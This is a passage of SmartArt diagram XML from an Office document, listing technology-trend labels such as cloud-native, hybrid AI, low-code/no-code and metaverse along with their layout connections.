      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="de-CH"/>
            <a:t>App ubiquity</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C461C668-3EBE-46F5-8FD6-E8EFEAF0C43E}" type="parTrans" cxnId="{C88428A5-1506-4B2F-9366-EE48E010EEAC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{46DE4F2B-FE16-4437-8968-74B62F173C11}" type="sibTrans" cxnId="{C88428A5-1506-4B2F-9366-EE48E010EEAC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{75FD0598-E44B-42EB-BF44-170A0650796F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="de-CH" dirty="0"/>
            <a:t>Cloud-native</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7151DE3-4C8A-4CF6-8C57-B49CD566FB7D}" type="parTrans" cxnId="{FD9BF2AC-71BF-447E-A7FD-91B418E7B0B6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E0CC1BA0-8B2F-437A-AB99-3B84F35A97FA}" type="sibTrans" cxnId="{FD9BF2AC-71BF-447E-A7FD-91B418E7B0B6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3EA9B26C-5C45-4607-A892-BE8663C8C45F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="de-CH"/>
            <a:t>Unified data</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D03B739-A178-40EE-A3C7-6147DA7791FF}" type="parTrans" cxnId="{9264631E-2D67-4D4E-85EC-B4B7F9707AB3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A5E955C-F51F-4AD5-AFC4-0F01C4821A12}" type="sibTrans" cxnId="{9264631E-2D67-4D4E-85EC-B4B7F9707AB3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1B3FCD60-00B2-4502-8786-95938452E3C4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="de-CH"/>
            <a:t>Models as platforms</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DA1E400-4392-45D9-A9F2-D2B78DC5BBB8}" type="parTrans" cxnId="{EDD99F85-F076-4E83-B309-CB65B8B4FA3D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C07B257-5429-477C-BF2D-3D33B99E0FA4}" type="sibTrans" cxnId="{EDD99F85-F076-4E83-B309-CB65B8B4FA3D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{57E7CB12-014A-4298-8EE6-0FC2A80553E7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="de-CH"/>
            <a:t>Hybrid AI</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2BE010F-E521-4EE8-AF93-1666F8B59584}" type="parTrans" cxnId="{78542F17-9442-490F-B46A-4836225E1227}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{080F3DB4-33AE-4B6E-9495-FD26503D6E4C}" type="sibTrans" cxnId="{78542F17-9442-490F-B46A-4836225E1227}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{97E10947-E120-45CB-AE9B-A5B741B2C135}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="de-CH" dirty="0"/>
            <a:t>Low-code / </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" dirty="0" err="1"/>
            <a:t>no</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" dirty="0"/>
            <a:t>-code</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{94C3C75E-C4C1-49F5-ABCC-E2F42096B736}" type="parTrans" cxnId="{06FDC5BE-4935-4943-A16A-93C9E84B0284}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{582D3DF0-AEB2-4470-84EF-C1B87D32216A}" type="sibTrans" cxnId="{06FDC5BE-4935-4943-A16A-93C9E84B0284}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FA65D01A-3562-42C3-AF28-570E694A4BAE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="de-CH"/>
            <a:t>Collaborative apps</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{98B2D2A7-D809-423C-BF49-5D77AC25404C}" type="parTrans" cxnId="{7810D038-52CF-4938-B8F1-2EF530704BE7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D577B155-1A79-4B2A-B8BB-0FF97ED3FF30}" type="sibTrans" cxnId="{7810D038-52CF-4938-B8F1-2EF530704BE7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C1D828B-1362-4C30-8868-47BA09D30467}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="de-CH"/>
            <a:t>Metaverse</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F621111C-677B-4DE8-A5B2-AC00FB882366}" type="parTrans" cxnId="{EDD205B8-5A71-4E58-8EF1-EF2D2518795B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DC4CF3DC-095B-46BA-ABFE-D3D32C87FFB7}" type="sibTrans" cxnId="{EDD205B8-5A71-4E58-8EF1-EF2D2518795B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" type="pres">
      <dgm:prSet presAssocID="{9F8C0634-0058-4AA7-BCF3-151690BA706D}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A46CC34C-8DA1-44EA-86B6-C6F8D70D19EA}" type="pres">
      <dgm:prSet presAssocID="{6FCE417A-8C24-494E-9563-C3DF00FBFF9C}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C182C71F-695A-46EF-873A-691B5449B1C7}" type="pres">
      <dgm:prSet presAssocID="{A5387A4C-F04B-4347-BD7A-189122A74A74}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D0EA8E9F-8B98-4306-8F3F-42E07B5D4F10}" type="pres">
      <dgm:prSet presAssocID="{792440E5-553F-4BC7-BF18-67182993716D}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{39F79D57-1785-4DA3-896B-C43585F278CA}" type="pres">
      <dgm:prSet presAssocID="{B1857A80-61C4-47C9-B0DE-E450885961DF}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{27F28314-A3FD-4ECF-835F-F9A2C49E8011}" type="pres">
      <dgm:prSet presAssocID="{3799947F-16D9-4745-AA05-DB4597835A44}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{822EADD9-1CF5-44C2-B9E4-BF8ABE33D8E2}" type="pres">
      <dgm:prSet presAssocID="{46DE4F2B-FE16-4437-8968-74B62F173C11}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{412E78AC-0D05-4E77-A92F-D63C08BC9E2A}" type="pres">
      <dgm:prSet presAssocID="{75FD0598-E44B-42EB-BF44-170A0650796F}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E0D6CC84-FCC8-4D07-9A41-DC72A9326F4E}" type="pres">
      <dgm:prSet presAssocID="{E0CC1BA0-8B2F-437A-AB99-3B84F35A97FA}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C5496DAD-EA5A-4592-AE23-B5AB9247B13B}" type="pres">
      <dgm:prSet presAssocID="{3EA9B26C-5C45-4607-A892-BE8663C8C45F}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C1A94574-0360-42B7-838C-DFFB57191224}" type="pres">
      <dgm:prSet presAssocID="{0A5E955C-F51F-4AD5-AFC4-0F01C4821A12}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3FF7B008-699E-4921-9EC8-3BFBC6495CDC}" type="pres">
      <dgm:prSet presAssocID="{1B3FCD60-00B2-4502-8786-95938452E3C4}" presName="node" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CE489F7C-5199-49C7-AA62-6C1D1286A3E0}" type="pres">
      <dgm:prSet presAssocID="{1C07B257-5429-477C-BF2D-3D33B99E0FA4}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{74D88E0B-25CB-4581-B399-221EE7F07D5E}" type="pres">
      <dgm:prSet presAssocID="{57E7CB12-014A-4298-8EE6-0FC2A80553E7}" presName="node" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{08AA8DDA-FA8B-469B-BB4D-A1B39C824B37}" type="pres">
      <dgm:prSet presAssocID="{080F3DB4-33AE-4B6E-9495-FD26503D6E4C}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9FD1CBDF-7E6E-414E-B347-619EE2F7F926}" type="pres">
      <dgm:prSet presAssocID="{97E10947-E120-45CB-AE9B-A5B741B2C135}" presName="node" presStyleLbl="node1" presStyleIdx="7" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{828323A0-2CFE-4B5E-9E5A-92AF15218D34}" type="pres">
      <dgm:prSet presAssocID="{582D3DF0-AEB2-4470-84EF-C1B87D32216A}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{186D59CA-82B1-444C-A561-CEE8BED00739}" type="pres">
      <dgm:prSet presAssocID="{FA65D01A-3562-42C3-AF28-570E694A4BAE}" presName="node" presStyleLbl="node1" presStyleIdx="8" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A2905200-6A8F-4452-B531-A688E4AC5AA8}" type="pres">
      <dgm:prSet presAssocID="{D577B155-1A79-4B2A-B8BB-0FF97ED3FF30}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A3B3CD3B-6DD8-4694-8035-F229DDC91066}" type="pres">
      <dgm:prSet presAssocID="{1C1D828B-1362-4C30-8868-47BA09D30467}" presName="node" presStyleLbl="node1" presStyleIdx="9" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{9C9E2502-4BFC-4560-A7F4-E4272795819E}" type="presOf" srcId="{9F8C0634-0058-4AA7-BCF3-151690BA706D}" destId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{78542F17-9442-490F-B46A-4836225E1227}" srcId="{9F8C0634-0058-4AA7-BCF3-151690BA706D}" destId="{57E7CB12-014A-4298-8EE6-0FC2A80553E7}" srcOrd="6" destOrd="0" parTransId="{A2BE010F-E521-4EE8-AF93-1666F8B59584}" sibTransId="{080F3DB4-33AE-4B6E-9495-FD26503D6E4C}"/>
    <dgm:cxn modelId="{9264631E-2D67-4D4E-85EC-B4B7F9707AB3}" srcId="{9F8C0634-0058-4AA7-BCF3-151690BA706D}" destId="{3EA9B26C-5C45-4607-A892-BE8663C8C45F}" srcOrd="4" destOrd="0" parTransId="{0D03B739-A178-40EE-A3C7-6147DA7791FF}" sibTransId="{0A5E955C-F51F-4AD5-AFC4-0F01C4821A12}"/>
    <dgm:cxn modelId="{7810D038-52CF-4938-B8F1-2EF530704BE7}" srcId="{9F8C0634-0058-4AA7-BCF3-151690BA706D}" destId="{FA65D01A-3562-42C3-AF28-570E694A4BAE}" srcOrd="8" destOrd="0" parTransId="{98B2D2A7-D809-423C-BF49-5D77AC25404C}" sibTransId="{D577B155-1A79-4B2A-B8BB-0FF97ED3FF30}"/>
    <dgm:cxn modelId="{95006A3F-7306-4C5B-897B-8F069256DD8B}" srcId="{9F8C0634-0058-4AA7-BCF3-151690BA706D}" destId="{792440E5-553F-4BC7-BF18-67182993716D}" srcOrd="1" destOrd="0" parTransId="{1E595194-6D73-46B1-8EDC-C7136CA9299F}" sibTransId="{B1857A80-61C4-47C9-B0DE-E450885961DF}"/>
    <dgm:cxn modelId="{1B66C667-8917-4BEF-BA29-C42461F4DDDF}" type="presOf" srcId="{97E10947-E120-45CB-AE9B-A5B741B2C135}" destId="{9FD1CBDF-7E6E-414E-B347-619EE2F7F926}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{465A7469-5D9A-47D2-ACBA-1E1498565540}" type="presOf" srcId="{75FD0598-E44B-42EB-BF44-170A0650796F}" destId="{412E78AC-0D05-4E77-A92F-D63C08BC9E2A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{438A154F-BBEA-4005-97FC-5866989FAF95}" type="presOf" srcId="{3799947F-16D9-4745-AA05-DB4597835A44}" destId="{27F28314-A3FD-4ECF-835F-F9A2C49E8011}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{98D2FA75-FD38-40E0-919F-159BB539B774}" type="presOf" srcId="{57E7CB12-014A-4298-8EE6-0FC2A80553E7}" destId="{74D88E0B-25CB-4581-B399-221EE7F07D5E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{EDD99F85-F076-4E83-B309-CB65B8B4FA3D}" srcId="{9F8C0634-0058-4AA7-BCF3-151690BA706D}" destId="{1B3FCD60-00B2-4502-8786-95938452E3C4}" srcOrd="5" destOrd="0" parTransId="{1DA1E400-4392-45D9-A9F2-D2B78DC5BBB8}" sibTransId="{1C07B257-5429-477C-BF2D-3D33B99E0FA4}"/>
    <dgm:cxn modelId="{B21FCE96-EDBC-4F29-969B-15B3C11DFD8D}" type="presOf" srcId="{FA65D01A-3562-42C3-AF28-570E694A4BAE}" destId="{186D59CA-82B1-444C-A561-CEE8BED00739}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{C88428A5-1506-4B2F-9366-EE48E010EEAC}" srcId="{9F8C0634-0058-4AA7-BCF3-151690BA706D}" destId="{3799947F-16D9-4745-AA05-DB4597835A44}" srcOrd="2" destOrd="0" parTransId="{C461C668-3EBE-46F5-8FD6-E8EFEAF0C43E}" sibTransId="{46DE4F2B-FE16-4437-8968-74B62F173C11}"/>
    <dgm:cxn modelId="{40FB05AB-AE3F-4B84-A21B-7C7D31B0714D}" srcId="{9F8C0634-0058-4AA7-BCF3-151690BA706D}" destId="{6FCE417A-8C24-494E-9563-C3DF00FBFF9C}" srcOrd="0" destOrd="0" parTransId="{426D72BA-952A-48DB-8E98-5FE37609E071}" sibTransId="{A5387A4C-F04B-4347-BD7A-189122A74A74}"/>
    <dgm:cxn modelId="{FD9BF2AC-71BF-447E-A7FD-91B418E7B0B6}" srcId="{9F8C0634-0058-4AA7-BCF3-151690BA706D}" destId="{75FD0598-E44B-42EB-BF44-170A0650796F}" srcOrd="3" destOrd="0" parTransId="{D7151DE3-4C8A-4CF6-8C57-B49CD566FB7D}" sibTransId="{E0CC1BA0-8B2F-437A-AB99-3B84F35A97FA}"/>
    <dgm:cxn modelId="{55D275AE-B06C-4CC2-887F-9D059D23C096}" type="presOf" srcId="{6FCE417A-8C24-494E-9563-C3DF00FBFF9C}" destId="{A46CC34C-8DA1-44EA-86B6-C6F8D70D19EA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{EDD205B8-5A71-4E58-8EF1-EF2D2518795B}" srcId="{9F8C0634-0058-4AA7-BCF3-151690BA706D}" destId="{1C1D828B-1362-4C30-8868-47BA09D30467}" srcOrd="9" destOrd="0" parTransId="{F621111C-677B-4DE8-A5B2-AC00FB882366}" sibTransId="{DC4CF3DC-095B-46BA-ABFE-D3D32C87FFB7}"/>
    <dgm:cxn modelId="{06FDC5BE-4935-4943-A16A-93C9E84B0284}" srcId="{9F8C0634-0058-4AA7-BCF3-151690BA706D}" destId="{97E10947-E120-45CB-AE9B-A5B741B2C135}" srcOrd="7" destOrd="0" parTransId="{94C3C75E-C4C1-49F5-ABCC-E2F42096B736}" sibTransId="{582D3DF0-AEB2-4470-84EF-C1B87D32216A}"/>
    <dgm:cxn modelId="{DC80F2CB-6C82-4BA1-8D23-6F42A309E454}" type="presOf" srcId="{1C1D828B-1362-4C30-8868-47BA09D30467}" destId="{A3B3CD3B-6DD8-4694-8035-F229DDC91066}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{57EAFCE7-82EA-42FC-8F8D-CB560826D404}" type="presOf" srcId="{3EA9B26C-5C45-4607-A892-BE8663C8C45F}" destId="{C5496DAD-EA5A-4592-AE23-B5AB9247B13B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{C15EFBED-B061-4ACC-BCE5-6455DE7E5F69}" type="presOf" srcId="{792440E5-553F-4BC7-BF18-67182993716D}" destId="{D0EA8E9F-8B98-4306-8F3F-42E07B5D4F10}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{13A4E8F1-A2B7-460E-9AE9-3830621754A1}" type="presOf" srcId="{1B3FCD60-00B2-4502-8786-95938452E3C4}" destId="{3FF7B008-699E-4921-9EC8-3BFBC6495CDC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{692C41EF-54D0-486C-851C-8F33C026E6AF}" type="presParOf" srcId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" destId="{A46CC34C-8DA1-44EA-86B6-C6F8D70D19EA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{BEE00E5A-24FB-4F84-91F9-41CC2E31EFA5}" type="presParOf" srcId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" destId="{C182C71F-695A-46EF-873A-691B5449B1C7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{1CB33813-1567-4692-BA61-D39313D1E4EC}" type="presParOf" srcId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" destId="{D0EA8E9F-8B98-4306-8F3F-42E07B5D4F10}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{E48D3BCD-FCDF-41A9-9A34-1D43E205F3C1}" type="presParOf" srcId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" destId="{39F79D57-1785-4DA3-896B-C43585F278CA}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{EA4EFCCA-5E13-4BD6-81CA-917CD5A0CCBE}" type="presParOf" srcId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" destId="{27F28314-A3FD-4ECF-835F-F9A2C49E8011}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{73AF9364-96FA-43DC-A78B-4816D5653B38}" type="presParOf" srcId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" destId="{822EADD9-1CF5-44C2-B9E4-BF8ABE33D8E2}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{2B61B2E1-9BA9-405E-B7CD-80D772D7AF27}" type="presParOf" srcId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" destId="{412E78AC-0D05-4E77-A92F-D63C08BC9E2A}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{CF2368AA-6EDF-4076-8282-B1D3803750C8}" type="presParOf" srcId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" destId="{E0D6CC84-FCC8-4D07-9A41-DC72A9326F4E}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{6B6E0A5F-7A3A-47BC-A554-865CBFD3442A}" type="presParOf" srcId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" destId="{C5496DAD-EA5A-4592-AE23-B5AB9247B13B}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{A00702F7-F606-410F-AF92-D2E1FBEE8350}" type="presParOf" srcId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" destId="{C1A94574-0360-42B7-838C-DFFB57191224}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{41D5CE38-E88E-4B16-90DF-D06336C1EA6D}" type="presParOf" srcId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" destId="{3FF7B008-699E-4921-9EC8-3BFBC6495CDC}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{E92E2A17-B21B-4129-9B7F-B227AD51BE96}" type="presParOf" srcId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" destId="{CE489F7C-5199-49C7-AA62-6C1D1286A3E0}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{7C120EC5-12E5-455B-9FF8-58C416F26BF9}" type="presParOf" srcId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" destId="{74D88E0B-25CB-4581-B399-221EE7F07D5E}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{9A103B7D-DC4D-4514-A7F4-90FE580DCB3F}" type="presParOf" srcId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" destId="{08AA8DDA-FA8B-469B-BB4D-A1B39C824B37}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{C4ADD309-3598-4EAD-803F-898C3A7EB7F6}" type="presParOf" srcId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" destId="{9FD1CBDF-7E6E-414E-B347-619EE2F7F926}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{C0DD7F9C-70C6-41D1-B943-117A75390291}" type="presParOf" srcId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" destId="{828323A0-2CFE-4B5E-9E5A-92AF15218D34}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{96977021-CF45-4A9F-98B2-C8F5D6144E4A}" type="presParOf" srcId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" destId="{186D59CA-82B1-444C-A561-CEE8BED00739}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
